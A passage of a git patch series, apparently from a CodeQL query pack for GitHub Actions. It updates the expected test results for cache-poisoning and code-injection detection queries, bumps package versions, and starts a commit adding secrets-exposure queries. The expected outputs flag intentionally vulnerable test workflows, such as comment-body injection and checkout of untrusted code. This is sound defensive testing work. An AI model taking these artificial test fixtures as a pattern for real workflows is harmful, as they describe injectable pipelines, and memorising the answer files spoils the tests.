| Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref deleted file mode 100644 index 2cbd05800e6..00000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref +++ /dev/null @@ -1,2 +0,0 @@ -Security/CWE-349/CachePoisoning.ql - diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected deleted file mode 100644 index e0a5e8fd4b1..00000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected +++ /dev/null @@ -1,20 +0,0 @@ -edges -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | provenance | | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | provenance | | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | provenance | | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | provenance | | -nodes -| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test10.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | semmle.label | Uses Step: modified_files | -| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | -| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | -| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | semmle.label | steps.modified_files.outputs.files_added | -| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | semmle.label | steps.modified_files.outputs.files_removed | -subpaths -#select -| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | -| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | -| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | ${{ steps.modified_files.outputs.files_added }} | -| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | ${{ steps.modified_files.outputs.files_removed }} | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref deleted file mode 100644 index cd1a90049a6..00000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref +++ /dev/null @@ -1,2 +0,0 @@ -Security/CWE-349/CachePoisoningByCodeInjection.ql - diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected new file mode 100644 index 00000000000..d9f659cbcc3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected @@ -0,0 +1,11 @@ +edges +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | provenance | | +nodes +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | semmle.label | Uses Step: modified_files | +| .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | +| .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref new file mode 100644 index 00000000000..8ac48aad93e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningViaCodeInjection.ql + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected new file mode 100644 index 00000000000..8bd69d8f245 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected @@ -0,0 +1,48 @@ +edges +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | +| .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | +| .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:22:9:23:21 | Run Step | +| .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:18:9:19:21 | Run Step | +| .github/workflows/direct_cache3.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | +| .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:23:9:24:21 | Run Step | +| .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | +| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache3.yml:13:9:14:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | +| .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | +| .github/workflows/poisonable_step1.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | +| .github/workflows/poisonable_step1.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | +| .github/workflows/poisonable_step1.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | +| .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | +| .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | +| .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | +| .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | +| .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | +| .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | +#select +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref new file mode 100644 index 00000000000..9d1910990fc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningViaDirectCache.ql + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected new file mode 100644 index 00000000000..a515bd87334 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected @@ -0,0 +1,49 @@ +edges +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | +| .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | +| .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:22:9:23:21 | Run Step | +| .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:18:9:19:21 | Run Step | +| .github/workflows/direct_cache3.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | +| .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:23:9:24:21 | Run Step | +| .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | +| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache3.yml:13:9:14:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | +| .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | +| .github/workflows/poisonable_step1.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | +| .github/workflows/poisonable_step1.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | +| .github/workflows/poisonable_step1.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | +| .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | +| .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | +| .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | +| .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | +| .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | +| .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | +#select +| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref new file mode 100644 index 00000000000..89db21d70f5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningViaPoisonableStep.ql + From 9f79e51e89f29b550154143b7583214387ad0bd8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 12:46:28 +0200 Subject: [PATCH 0457/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1c4415a305d..31270d39972 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.31 +version: 0.1.32 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 9b49717942b..99e9fac00a4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.31 +version: 0.1.32 groups: [actions, queries] suites: codeql-suites extractor: javascript From 6842babd163be86495550d0a29fad704a9484d1f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 23:08:52 +0200 Subject: [PATCH 0458/1267] feat(query): New queries for incorrect secrets handling ExcessiveSecretsExposure: Reports when all secrets are passed to the workflow runner since that violates the principle of least privelege. UnmaskedSecretExposure: Reports when secrets are derived from a JSON secret since they wont get masked by the workflow runner --- ql/lib/codeql/actions/ast/internal/Ast.qll | 4 +-- .../CWE-312/ExcessiveSecretsExposure.ql | 23 +++++++++++++++++ .../CWE-312/UnmaskedSecretExposure.ql | 19 ++++++++++++++ .../CWE-312/.github/workflows/neg_test1.yml 